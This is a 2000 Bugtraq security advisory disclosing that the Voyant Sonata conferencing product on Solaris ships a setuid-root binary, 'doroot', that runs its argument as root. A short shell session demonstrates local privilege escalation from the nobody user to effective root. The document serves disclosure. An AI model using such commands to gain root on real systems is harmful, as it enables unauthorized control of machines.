From lwc@VAPID.DHS.ORG Tue Dec 19 00:27:58 2000 From: "Larry W. Cashdollar" To: BUGTRAQ@SECURITYFOCUS.COM Date: Mon, 18 Dec 2000 13:23:22 -0800 Subject: [BUGTRAQ] More Sonata Conferencing software vulnerabilities. Vulnerability Report #2 For Voyant Technologies Sonata Conferencing product. Larry W. Cashdollar Vapid Labs Date Published: 12/18/2000 Advisory ID: 12182000-02 CVE CAN: None currently assigned. Title: Sonata doroot command vulnerability. Class: Design Error Remotely Exploitable: no Locally Exploitable: Yes Vulnerability Description: The setuid binary doroot does exactly what it says. It executes its command line argument as root. This is really silly and I dont know why it would need to exist. Vulnerable Packages/Systems: Sonata v3.x on Solaris 2.x. Vendor notified on: 11/30/2000 Solution/Vendor Information/Workaround: The vendor has told us in so many words that the security of the conferencing system is up to the customer. This will make it pretty difficult to make modifications to our system since it is production and we can't have any downtime. I would contact Voyant anyhow for a solution. I can not test the affects of removing the setuid bit on our systems until later this week. Credits: Larry W. Cashdollar http://vapid.betteros.org Technical Description - Exploit/Concept Code: $ cd /opt/TK/tk4.1/library/demos $ id uid=60001(nobody) gid=60001(nobody) $ ./doroot id uid=60001(nobody) gid=60001(nobody) euid=0(root) $ ls -l doroot -rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot References: Sonata product page. http://www.voyanttech.com/displaypage.cfm?pid=27&toppid=22 Vapid Labs. http://vapid.betteros.org Email: Larry W. Cashdollar DISCLAIMER: The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. Ver 2.4 11/30/2000